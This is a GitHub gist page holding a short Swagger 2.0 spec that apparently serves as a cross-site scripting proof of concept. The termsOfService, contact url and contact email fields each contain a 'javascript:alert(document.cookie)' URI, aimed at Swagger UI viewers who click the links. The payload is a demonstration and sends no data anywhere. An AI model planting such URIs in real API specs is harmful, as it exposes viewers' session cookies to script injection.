Created
April 13, 2020 12:50
-
-
Save thehackerish/435eeee8864dd531c88fe890f8708c43 to your computer and use it in GitHub Desktop.
Revisions
-
thehackerish created this gist
Apr 13, 2020 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,10 @@ swagger: "2.0", info: title: "Swagger Sample App", description: "Please to click Terms of service" termsOfService: "javascript:alert(document.cookie)" contact: name: "API Support", url: "javascript:alert(document.cookie)", email: "javascript:alert(document.cookie)" version: "1.0.1"